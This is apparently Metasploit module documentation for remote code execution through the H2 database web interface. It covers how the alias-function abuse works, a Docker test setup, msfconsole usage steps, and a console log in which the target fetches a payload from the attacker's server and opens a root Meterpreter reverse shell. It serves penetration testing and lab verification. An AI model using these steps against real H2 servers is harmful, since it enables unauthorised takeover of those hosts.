## Vulnerable Application

The H2 database contains an alias function which allows for arbitrary Java code to be used.
This functionality can be abused to create an exec functionality to pull our payload down
and execute it. H2's web interface contains restricts MANY characters, so injecting a payload
directly is not favorable. A valid database connection is required. If the database engine
was configured to allow creation of databases, the module default can be used which
utilizes an in memory database. Some Docker instances of H2 don't allow writing to
folders such as /tmp, so we default to writing to the working directory of the software.

This module was tested against H2 version 2.1.214, 2.0.204, 1.4.199 (version detection fails)

### Application Install

The `ifNotExists` option is used to allow for creation of new databases from the web interface. This substantially speeds
up testing of the exploit.

```
docker run -d -p 1521:1521 -p 81:81 -v /path/to/local/data_dir:/opt/h2-data -e H2_OPTIONS=-ifNotExists --name=MyH2Instance oscarfonts/h2
```

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use exploit/linux/http/h2_webinterface_rce`
1. Do: `set rhosts [ip]`
1. Do: `set rport [port]`
1. Do: `run`
1. You should get a shell.

## Options

### DATABASE

The database to connect to. If a default was already filled in, it is shown during module execution.
Defaults to `jdbc:h2:mem:` which is an in-memory DB to avoid writing to disc.

### GETVERSION

Will retrieve the version of the server. Most likely only works on 2.0.0+. Defaults to `true`

## Scenarios

### H2 Version 2.1.214 from Docker

```
msf > use exploit/linux/http/h2_webinterface_rce
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
msf exploit(linux/http/h2_webinterface_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf exploit(linux/http/h2_webinterface_rce) > set rport 81
rport => 81
msf exploit(linux/http/h2_webinterface_rce) > set verbose true
verbose => true
msf exploit(linux/http/h2_webinterface_rce) > set lhost 111.111.11.111
lhost => 111.111.11.111
msf exploit(linux/http/h2_webinterface_rce) > set srvhost 111.111.11.111
srvhost => 111.111.11.111
msf exploit(linux/http/h2_webinterface_rce) > exploit

[*] Started reverse TCP handler on 111.111.11.111:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Obtaining jsessionid (cookie equivalent)
[+] jsessionid (cookie equivalent): ec97655f1aa8e1132fd8bd0e5581d9f0
[*] Detected autofilled DB: jdbc:h2:mem:
[+] The target is vulnerable. 127.0.0.1:81 - H2 web interface found, and database connection successful
[*] Obtaining jsessionid (cookie equivalent)
[+] jsessionid (cookie equivalent): 9828fc9f6bd0de76e0c88f44a07fc7bb
[+] H2 Version detected: 2.1.214
[*] Using URL: http://111.111.11.111:8080/D1OHj7
[*] Saving payload as AYZER67Th.sh
[*] Attempting to execute payload retrieval
[+] Received payload request
[*] Sending stage (24772 bytes) to 222.222.2.2
[*] Meterpreter session 1 opened (111.111.11.111:4444 -> 222.222.2.2:43968) at 2023-07-27 16:44:03 +0000
[*] Server stopped.

meterpreter > getuid
Server username: root
```
